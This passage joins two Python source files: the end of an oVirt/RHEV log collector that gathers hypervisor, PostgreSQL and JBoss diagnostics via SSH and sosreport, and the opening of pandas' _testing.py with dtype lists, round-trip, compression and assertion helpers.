# that are all related to hypervisors.
os.rename(os.path.join(self.configuration["local_scratch_dir"], self.configuration["filename"]),
os.path.join(self.configuration["local_scratch_dir"], "postgresql-%s" % self.configuration["filename"]))
class LogCollector(object):
def __init__(self, configuration):
self.conf = configuration
if self.conf.command is None:
raise Exception("No command specified.")
def write_time_diff(self, queue):
local_scratch_dir = self.conf.get("local_scratch_dir")
with open(os.path.join(local_scratch_dir, DEFAULT_TIME_SHIFT_FILE), "w") as fd:
for record in queue:
fd.write(record + "\n")
def _get_hypervisors_from_api(self):
if not self.conf:
raise Exception("No configuration.")
try:
self.conf.prompt("engine", msg="hostname of oVirt Engine")
self.conf.prompt("user", msg="REST API username for oVirt Engine")
self.conf.getpass("passwd", msg="REST API password for the %s oVirt Engine user" % self.conf.get("user"))
except Configuration.SkipException:
logging.info("Will not collect hypervisor list from oVirt Engine API.")
raise
try:
return hypervisors.get_all(self.conf.get("engine"),
self.conf.get("user"),
self.conf.get("passwd"))
except Exception, e:
ExitCodes.exit_code=ExitCodes.WARN
logging.error("_get_hypervisors_from_api: %s" % e)
return set()
@staticmethod
def _sift_patterns(list_):
"""Returns two sets: patterns and others. A pattern is any string
that contains any of the following: * [ ] ?"""
patterns = set()
others = set()
try:
for candidate in list_:
if any(c in candidate for c in ('*', '[', ']', '?')):
patterns.add(candidate)
else:
others.add(candidate)
except TypeError:
pass
return patterns, others
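# Hedged illustration of the split performed above (hypothetical names):
#   LogCollector._sift_patterns(["hv01.example.com", "rack-*.example.com"])
#   -> patterns == {"rack-*.example.com"}, others == {"hv01.example.com"}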
def _filter_hosts(self, which, pattern):
logging.debug("filtering host list with %s against %s name" % (pattern, which))
if which == "host":
return set([(dc, cl, h) for dc, cl, h in self.conf.get("hosts")
if fnmatch.fnmatch(h, pattern)])
elif which == "cluster":
return set([(dc, cl, h) for dc, cl, h in self.conf.get("hosts")
if fnmatch.fnmatch(cl, pattern)])
elif which == "datacenter":
return set([(dc, cl, h) for dc, cl, h in self.conf.get("hosts")
if fnmatch.fnmatch(dc, pattern)])
def set_hosts(self):
"""Fetches the hostnames for the supplied cluster or datacenter.
Filtering is applied if patterns are found in the --hosts, --cluster
or --data-center options. There can be multiple patterns in each
option. Patterns found within the same option are inclusive and
the option sets are then intersected with one another.
"""
self.conf["hosts"] = set()
host_patterns, host_others = self._sift_patterns(self.conf.get("hosts_list"))
datacenter_patterns = self.conf.get("datacenter", [])
cluster_patterns = self.conf.get("cluster", [])
if host_patterns:
self.conf['host_pattern'] = host_patterns
if any((host_patterns,
datacenter_patterns,
cluster_patterns)) or not host_others:
self.conf["hosts"] = self._get_hypervisors_from_api()
host_filtered = set()
cluster_filtered = set()
datacenter_filtered = set()
if host_patterns:
for pattern in host_patterns:
host_filtered |= self._filter_hosts("host", pattern)
self.conf['hosts'] &= host_filtered
if datacenter_patterns:
for pattern in datacenter_patterns:
datacenter_filtered |= self._filter_hosts("datacenter", pattern)
self.conf['hosts'] &= datacenter_filtered
if cluster_patterns:
for pattern in cluster_patterns:
cluster_filtered |= self._filter_hosts("cluster", pattern)
self.conf['hosts'] &= cluster_filtered
# build a set of hostnames that are already in the target host list.
# So that we can prevent duplication in the next step
hostnames = set((t[2] for t in self.conf['hosts']))
for hostname in host_others:
if hostname not in hostnames:
self.conf['hosts'].add(("", "", hostname))
return bool(self.conf.get("hosts"))
def list_hosts(self):
def get_host(tuple_):
return tuple_[2]
host_list = list(self.conf.get("hosts"))
host_list.sort(key=get_host)
fmt = "%-20s | %-20s | %s"
print "Host list (datacenter=%(datacenter)s, cluster=%(cluster)s, host=%(host_pattern)s):" % self.conf
print fmt % ("Data Center", "Cluster", "Hostname/IP Address")
print "\n".join(fmt % (dc, cluster, host) for dc, cluster, host in host_list)
def get_hypervisor_data(self):
hosts = self.conf.get("hosts")
if hosts:
if not self.conf.get("quiet"):
continue_ = get_from_prompt(
msg="About to collect information from %d hypervisors. Continue? (Y/n): " % len(hosts),
default='y')
if continue_ not in ('y', 'Y'):
logging.info("Aborting hypervisor collection...")
return
logging.info("Gathering information from selected hypervisors...")
max_connections = self.conf.get("max_connections", 10)
import threading
from collections import deque
# max_connections may be defined as a string via a .rc file
sem = threading.Semaphore(int(max_connections))
time_diff_queue = deque()
threads = []
for datacenter, cluster, host in hosts:
sem.acquire(True)
collector = HyperVisorData(host.strip(),
configuration=self.conf,
semaphore=sem,
queue=time_diff_queue)
thread = threading.Thread(target=collector.run)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
self.write_time_diff(time_diff_queue)
def get_postgres_data(self):
if self.conf.get("no_postgresql") == False:
try:
try:
self.conf.getpass("pg_pass", msg="password for the PostgreSQL user, %s, to dump the %s PostgreSQL database instance" %
(self.conf.get('pg_user'),
self.conf.get('pg_dbname')))
logging.info("Gathering PostgreSQL the oVirt Engine database and log files from %s..." % (self.conf.get("pg_dbhost")))
except Configuration.SkipException:
logging.info("PostgreSQL oVirt Engine database will not be collected.")
logging.info("Gathering PostgreSQL log files from %s..." % (self.conf.get("pg_dbhost")))
collector = PostgresData(self.conf.get("pg_dbhost"),
configuration=self.conf)
collector.sosreport()
except Exception, e:
ExitCodes.exit_code=ExitCodes.WARN
logging.error("Could not collect PostgreSQL information: %s" % e)
else:
ExitCodes.exit_code=ExitCodes.NOERR
logging.info("Skipping postgresql collection...")
def get_engine_data(self):
logging.info("Gathering oVirt Engine information...")
if self.conf.get("enable_jmx"):
try:
self.conf.getpass("jboss.pass", msg="password for the JBoss JMX user")
except Configuration.SkipException:
logging.info("JBoss JMX information will not be collected because the JMX user's password was not supplied.")
collector = ENGINEData("localhost",
configuration=self.conf)
stdout = collector.sosreport()
logging.info(stdout)
def parse_password(option, opt_str, value, parser):
value = getpass.getpass("Please enter %s: " % (option.help))
setattr(parser.values, option.dest, value)
if __name__ == '__main__':
def comma_separated_list(option, opt_str, value, parser):
setattr(parser.values, option.dest, [v.strip() for v in value.split(",")])
usage_string = "\n".join(("Usage: %prog [options] list",
" %prog [options] collect"))
epilog_string = """\nReturn values:
0: The program ran to completion with no errors.
1: The program encountered a critical failure and stopped.
2: The program encountered a problem gathering data but was able to continue.
"""
OptionParser.format_epilog = lambda self, formatter: self.epilog
parser = OptionParser(usage_string,
version="Version " + versionNum,
epilog=epilog_string)
parser.add_option("", "--conf-file", dest="conf_file",
help="path to configuration file (default=%s)" % DEFAULT_CONFIGURATION_FILE,
metavar="PATH")
parser.add_option("", "--local-tmp", dest="local_tmp_dir",
help="directory to copy reports to locally (default=%s)" % DEFAULT_SCRATCH_DIR, metavar="PATH",
default=DEFAULT_SCRATCH_DIR)
parser.add_option("", "--ticket-number", dest="ticket_number",
help="ticket number to pass with the sosreport",
metavar="TICKET")
parser.add_option("", "--upload", dest="upload",
help="Upload the report to Red Hat (use exclusively if advised from a Red Hat support representative).",
metavar="FTP_SERVER")
parser.add_option("", "--quiet", dest="quiet",
action="store_true", default=False,
help="reduce console output (default=False)")
parser.add_option("", "--log-file",
dest="log_file",
help="path to log file (default=%s)" % DEFAULT_LOG_FILE,
metavar="PATH",
default=DEFAULT_LOG_FILE)
parser.add_option("-v", "--verbose", dest="verbose",
action="store_true", default=False)
engine_group = OptionGroup(parser,
"oVirt Engine Configuration",
"""The options in the oVirt Engine configuration group can be used to filter log collection from one or more RHEV-H.
If the --no-hypervisors option is specified, data is not collected from any RHEV-H.""")
engine_group.add_option("", "--no-hypervisors",
help="skip collection from hypervisors (default=False)",
dest="no_hypervisor",
action="store_true",
default=False)
engine_group.add_option("-u", "--user", dest="user",
help="username to use with the REST API. This should be in UPN format.",
metavar="user@engine.example.com")
engine_group.add_option("-p",
"--passwd",
dest="passwd",
help=SUPPRESS_HELP)
engine_group.add_option("-r", "--engine", dest="engine", metavar="engine.example.com",
help="hostname or IP address of the oVirt Engine (default=localhost:8443)",
default="localhost:8443")
engine_group.add_option("-c", "--cluster", dest="cluster",
help="pattern, or comma separated list of patterns to filter the host list by cluster name (default=None)",
action="callback",
callback=comma_separated_list,
type="string",
default=None, metavar="CLUSTER")
engine_group.add_option("-d", "--data-center", dest="datacenter",
help="pattern, or comma separated list of patterns to filter the host list by data center name (default=None)",
action="callback",
callback=comma_separated_list,
type="string",
default=None, metavar="DATACENTER")
engine_group.add_option("-H", "--hosts", dest="hosts_list", action="callback",
callback=comma_separated_list,
type="string",
help="""comma separated list of hostnames, hostname patterns, FQDNs, FQDN patterns,
IP addresses, or IP address patterns from which the log collector should collect RHEV-H logs (default=None)""")
ssh_group = OptionGroup(parser, "SSH Configuration",
"""The options in the SSH configuration group can be used to specify the maximum
number of concurrent SSH connections to RHEV-H(s) for log collection, the
SSH port, and an identity file to be used.""")
ssh_group.add_option("", "--ssh-port", dest="ssh_port",
help="the port to ssh and scp on", metavar="PORT",
default=22)
ssh_group.add_option("-k", "--key-file", dest="key_file",
help="""the identity file (private key) to be used for accessing the RHEV-Hs (default=%s).
If an identity file is not supplied, the program will prompt for a password. It is strongly recommended to
use key based authentication with SSH because the program may make multiple SSH connections
resulting in multiple requests for the SSH password.""" % DEFAULT_SSH_KEY,
metavar="KEYFILE",
default=DEFAULT_SSH_KEY)
ssh_group.add_option("", "--max-connections", dest="max_connections",
help="max concurrent connections for fetching RHEV-H logs (default = 10)",
default=10)
db_group = OptionGroup(parser, "PostgreSQL Database Configuration",
"""The log collector will connect to the oVirt Engine PostgreSQL database and dump the data
for inclusion in the log report unless --no-postgresql is specified. The PostgreSQL user ID and database
name can be specified if they are different from the defaults. If the PostgreSQL database
is not on the localhost set pg-dbhost, provide a pg-ssh-user, and optionally supply pg-host-key and the log collector
will gather remote PostgreSQL logs. The PostgreSQL SOS plug-in must be installed on pg-dbhost for
successful remote log collection.""")
db_group.add_option("", "--no-postgresql", dest="no_postgresql",
help="This option causes the tool to skip the postgresql collection (default=false)",
action="store_true",
default=False)
db_group.add_option("", "--pg-user", dest="pg_user",
help="PostgreSQL database user name (default=postgres)",
metavar="postgres",
default="postgres")
db_group.add_option("",
"--pg-pass",
dest="pg_pass",
help=SUPPRESS_HELP)
db_group.add_option("", "--pg-dbname", dest="pg_dbname",
help="PostgreSQL database name (default=engine)",
metavar="engine",
default="engine")
db_group.add_option("", "--pg-dbhost", dest="pg_dbhost",
help="PostgreSQL database hostname or IP address (default=localhost)",
metavar="localhost",
default="localhost")
db_group.add_option("", "--pg-ssh-user", dest="pg_ssh_user",
help="""the SSH user that will be used to connect to the
server upon which the remote PostgreSQL database lives. (default=root)""",
metavar="root",
default='root')
db_group.add_option("", "--pg-host-key", dest="pg_host_key",
help="""the identity file (private key) to be used for accessing the host
upon which the PostgreSQL database lives (default=not needed if using localhost)""",
metavar="none")
jboss_group = OptionGroup(parser,
"SOSReport Options",
"""The JBoss SOS plug-in will always be executed. To activate data collection
from JBoss's JMX console enable-jmx, java-home, jboss-user, and jboss-pass must
also be specified. If no jboss-pass is supplied in the configuration file then
it will be asked for prior to collection time.""")
jboss_group.add_option("", "--jboss-home", dest="jboss.home",
help="JBoss's installation dir (default=/var/lib/jbossas)",
metavar="/path/to/jbossas",
default="/var/lib/jbossas")
jboss_group.add_option("", "--java-home", dest="jboss.javahome",
help="Java's installation dir (default=/usr/lib/jvm/java)",
metavar="/path/to/java",
default="/usr/lib/jvm/java")
jboss_group.add_option("", "--jboss-profile",
dest="jboss.profile",
action="callback",
type="string",
help="comma separated list of server profiles to limit collection (default='engine-slimmed')",
callback=comma_separated_list,
metavar="PROFILE1, PROFILE2",
default="engine-slimmed")
jboss_group.add_option("", "--enable-jmx", dest="enable_jmx",
help="Enable the collection of run-time metrics from the oVirt Engine JBoss JMX interface",
action="store_true",
default=False)
jboss_group.add_option("", "--jboss-user", dest="jboss.user",
help="JBoss JMX username (default=admin)",
metavar="admin",
default="admin")
jboss_group.add_option("",
"--jboss-pass",
dest="jboss.pass",
help=SUPPRESS_HELP)
jboss_group.add_option("", "--jboss-logsize", dest="jboss.logsize",
help="max size (MiB) to collect per log file (default=15)",
metavar="15",
default=15)
jboss_group.add_option("", "--jboss-stdjar", dest="jboss.stdjar",
metavar="on or off",
help="collect jar statistics for JBoss standard jars.(default=on)")
jboss_group.add_option("", "--jboss-servjar", dest="jboss.servjar",
metavar="on or off",
help="collect jar statistics from any server configuration dirs (default=on)")
jboss_group.add_option("", "--jboss-twiddle", dest="jboss.twiddle",
metavar="on or off",
help="collect twiddle data (default=on)")
jboss_group.add_option("", "--jboss-appxml",
dest="jboss.appxml",
action="callback",
type="string",
callback=comma_separated_list,
help="""comma separated list of application's whose XML descriptors you want (default=all)""",
metavar="APP, APP2",
default="all")
parser.add_option_group(engine_group)
parser.add_option_group(jboss_group)
parser.add_option_group(ssh_group)
parser.add_option_group(db_group)
try:
conf = Configuration(parser)
collector = LogCollector(conf)
# We must ensure that the working directory exists before
# we start doing anything.
if os.path.exists(conf["local_tmp_dir"]):
if not os.path.isdir(conf["local_tmp_dir"]):
raise Exception('%s is not a directory.' % (conf["local_tmp_dir"]))
else:
logging.info("%s does not exist. It will be created." % (conf["local_tmp_dir"]))
os.makedirs(conf["local_tmp_dir"])
# We need to make a temporary scratch directory wherein
# all of the output from VDSM and PostgreSQL SOS plug-ins
# will be dumped. The contents of this directory will be scooped
# up by the oVirt Engine SOS plug-in via the engine.vdsmlogs option
# and included in a single .xz file.
conf["local_scratch_dir"] = os.path.join(conf["local_tmp_dir"], 'RHEVH-and-PostgreSQL-reports')
if not os.path.exists(conf["local_scratch_dir"]):
os.makedirs(conf["local_scratch_dir"])
else:
if len(os.listdir(conf["local_scratch_dir"])) != 0:
raise Exception("""the scratch directory for temporary storage of RHEVH reports is not empty.
It should be empty so that reports from a prior invocation of the log collector are not collected again.
The directory is: %s'""" % (conf["local_scratch_dir"]))
if conf.command == "collect":
if not conf.get("no_hypervisor"):
if collector.set_hosts():
collector.get_hypervisor_data()
else:
logging.info("No hypervisors were selected, therefore no hypervisor data will be collected.")
else:
logging.info("Skipping hypervisor collection...")
collector.get_postgres_data()
collector.get_engine_data()
elif conf.command == "list":
if collector.set_hosts():
collector.list_hosts()
else:
logging.info("No hypervisors were found, therefore no hypervisor data will be listed.")
# Clean up the temp directory
shutil.rmtree(conf["local_scratch_dir"])
except KeyboardInterrupt, k:
print "Exiting on user cancel."
except Exception, e:
multilog(logging.error, e)
print "Use the -h option to see usage."
logging.debug("Configuration:")
try:
logging.debug("command: %s" % conf.command)
#multilog(logging.debug, pprint.pformat(conf))
except:
pass
multilog(logging.debug, traceback.format_exc())
sys.exit(ExitCodes.CRITICAL)
sys.exit(ExitCodes.exit_code)
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import operator
import os
import re
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, ContextManager, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._libs.lib import no_default
import pandas._libs.testing as _testing
from pandas._typing import Dtype, FilePathOrBuffer, FrameOrSeries
from pandas.compat import get_lzma_file, import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.core.arrays.datetimelike import DatetimeLikeArrayMixin
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = import_lzma()
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: List[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES = [bool, "bool"]
BYTES_DTYPES = [bytes, "bytes"]
OBJECT_DTYPES = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA]
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
# pandas\_testing.py:119: error: Argument 2 to "simplefilter" has
# incompatible type "Tuple[Type[DeprecationWarning],
# Type[ResourceWarning]]"; expected "Type[Warning]"
warnings.simplefilter(
"always", _testing_mode_warnings # type: ignore[arg-type]
)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
# pandas\_testing.py:126: error: Argument 2 to "simplefilter" has
# incompatible type "Tuple[Type[DeprecationWarning],
# Type[ResourceWarning]]"; expected "Type[Warning]"
warnings.simplefilter(
"ignore", _testing_mode_warnings # type: ignore[arg-type]
)
set_testing_mode()
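# Usage sketch (assumed shell environment, not part of this module): exporting
#   PANDAS_TESTING_MODE=deprecate
# before the interpreter starts makes set_testing_mode() register an "always"
# filter for DeprecationWarning and ResourceWarning.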
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
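# Minimal usage sketch (illustrative only):
#   df = DataFrame({"a": [1, 2, 3]})
#   result = round_trip_pickle(df)
#   assert_frame_equal(df, result)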
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
# pandas\_testing.py:243: error: Incompatible types in assignment
# (expression has type "IO[Any]", variable has type "BinaryIO")
f = gzip.open(path, "rb") # type: ignore[assignment]
elif compression == "bz2":
# pandas\_testing.py:245: error: Incompatible types in assignment
# (expression has type "BZ2File", variable has type "BinaryIO")
f = bz2.BZ2File(path, "rb") # type: ignore[assignment]
elif compression == "xz":
f = get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
# pandas\_testing.py:252: error: Incompatible types in assignment
# (expression has type "IO[bytes]", variable has type "BinaryIO")
f = zip_file.open(zip_names.pop()) # type: ignore[assignment]
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
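# Usage sketch (hypothetical path):
#   with decompress_file("data.csv.gz", compression="gzip") as fh:
#       raw = fh.read()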
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
compress_method = zipfile.ZipFile
elif compression == "gzip":
# pandas\_testing.py:288: error: Incompatible types in assignment
# (expression has type "Type[GzipFile]", variable has type
# "Type[ZipFile]")
compress_method = gzip.GzipFile # type: ignore[assignment]
elif compression == "bz2":
# pandas\_testing.py:290: error: Incompatible types in assignment
# (expression has type "Type[BZ2File]", variable has type
# "Type[ZipFile]")
compress_method = bz2.BZ2File # type: ignore[assignment]
elif compression == "xz":
compress_method = get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
# pandas\_testing.py:302: error: Incompatible types in assignment
# (expression has type "Tuple[Any]", variable has type "Tuple[Any,
# Any]")
args = (data,) # type: ignore[assignment]
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
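# Usage sketch (hypothetical paths and data): for ZIP archives the payload is
# written via writestr under the name given by `dest`; the other compressions
# write the bytes directly.
#   write_to_compressed("zip", "archive.zip", b"a,b\n1,2\n", dest="data.csv")
#   write_to_compressed("gzip", "data.csv.gz", b"a,b\n1,2\n")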
def _get_tol_from_less_precise(check_less_precise: Union[bool, int]) -> float:
"""
Return the tolerance equivalent to the deprecated `check_less_precise`
parameter.
Parameters
----------
check_less_precise : bool or int
Returns
-------
float
Tolerance to be used as relative/absolute tolerance.
Examples
--------
>>> # Using check_less_precise as a bool:
>>> _get_tol_from_less_precise(False)
0.5e-5
>>> _get_tol_from_less_precise(True)
0.5e-3
>>> # Using check_less_precise as an int representing the decimal
>>> # tolerance intended:
>>> _get_tol_from_less_precise(2)
0.5e-2
>>> _get_tol_from_less_precise(8)
0.5e-8
"""
if isinstance(check_less_precise, bool):
if check_less_precise:
# 3-digit tolerance
return 0.5e-3
else:
# 5-digit tolerance
return 0.5e-5
else:
# Equivalent to setting checking_less_precise=<decimals>
return 0.5 * 10 ** -check_less_precise
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = no_default,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
rtol : float, default 1e-5
Relative tolerance.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance.
.. versionadded:: 1.1.0
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left, right, check_dtype=check_dtype, rtol=rtol, atol=atol, **kwargs
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
return retval.astype(dtype)
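# Illustrative sketch: rands_array(4, 3) returns something like
#   array(['aB3x', 'Qz9m', 'Lk2P'], dtype=object)
# (the characters are random; only the shape and dtype are meaningful here).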
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import close as _close, get_fignums
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
Gets a temporary path and removes it on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
:meth:`tempfile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and remove it on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
